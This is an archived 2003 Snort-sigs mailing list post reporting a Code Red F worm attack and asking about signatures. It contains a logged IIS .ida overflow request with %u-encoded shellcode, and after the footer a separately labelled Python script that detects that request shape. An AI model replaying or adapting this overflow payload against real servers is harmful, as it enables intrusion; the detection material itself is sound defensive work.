
[Snort-sigs] New code-red Variant (code red F) sig available ?

From: Xavier FIQUET <xavier.fiquet(at)wanadoo.com>
Date: Thu Mar 13 2003 - 04:14:08 EST


Hello,

We have recently been targeted by some new variant of the Code Red .ida attempt.

Here is what we have:

XXX.XXX.XXX.XXX - - [13/Mar/2003:10:06:21 +0100] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205

"This worm is very similar to the other variants of CodeRed, specifically the .C variant. Its only difference with the .C variant is the trigger date when it restarts the system. The .C variant restarts the system if the year is greater than 2002. This .F variant, on the other hand, executes the same routine if the year is greater than or equal to 34952."

Best regards,

Xavier FIQUET




Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs

Received on Thu Mar 13 04:55:31 2003
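Added example, not part of the original message or of any Snort ruleset: a small access-log check for the request shape shown in the post (an .ida request whose query is a long filler run followed by %uXXXX-encoded words). The thresholds, the function name and the sample lines are assumptions made for illustration. Because the description quoted in the message says .F differs from .C only in its trigger date, a request-based check like this one cannot tell the two apart.

```python
import re

# Apache common/combined log prefix: host, ident, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Request for an .ida or .idq path that carries a query string
IDA_RE = re.compile(r'^(?P<path>[^?]*\.id[aq])\?(?P<query>.*)$', re.IGNORECASE)
U_ENC_RE = re.compile(r'%u[0-9a-fA-F]{4}')
MIN_PAD = 200   # assumed threshold for the leading filler run
MIN_UENC = 4    # assumed threshold for %uXXXX tokens after the filler

# Constructed sample lines: documentation addresses, filler length chosen
# arbitrarily, encoded tail abbreviated from the entry quoted in the post.
TAIL = "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u00=a"
SAMPLE = [
    '192.0.2.10 - - [13/Mar/2003:10:06:21 +0100] "GET /default.ida?'
    + "X" * 224 + TAIL + ' HTTP/1.0" 404 205',
    '192.0.2.11 - - [13/Mar/2003:10:07:02 +0100] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.12 - - [13/Mar/2003:10:08:40 +0100] "GET /search.ida?q=report HTTP/1.0" 404 205',
]


def inspect(line):
    """Return a finding dict for a Code Red style .ida/.idq request, else None."""
    m = LOG_RE.match(line)
    ida = IDA_RE.match(m.group("target")) if m else None
    if not ida:
        return None
    query = ida.group("query")
    pad_char = query[:1]
    # Length of the run of identical characters at the start of the query
    pad_len = len(query) - len(query.lstrip(pad_char)) if pad_char else 0
    u_tokens = len(U_ENC_RE.findall(query))
    if pad_len < MIN_PAD or u_tokens < MIN_UENC:
        return None  # ordinary .ida/.idq request, not the overflow shape
    return {"host": m.group("host"), "time": m.group("time"),
            "path": ida.group("path"), "pad_char": pad_char, "pad_len": pad_len,
            "u_tokens": u_tokens, "status": int(m.group("status"))}


if __name__ == "__main__":
    for entry in SAMPLE:
        print(inspect(entry))
```

The reported status matters for triage: a 404, as in the posted entry, means the server had no such resource to hand to the indexing extension.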

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:08:25 EDT

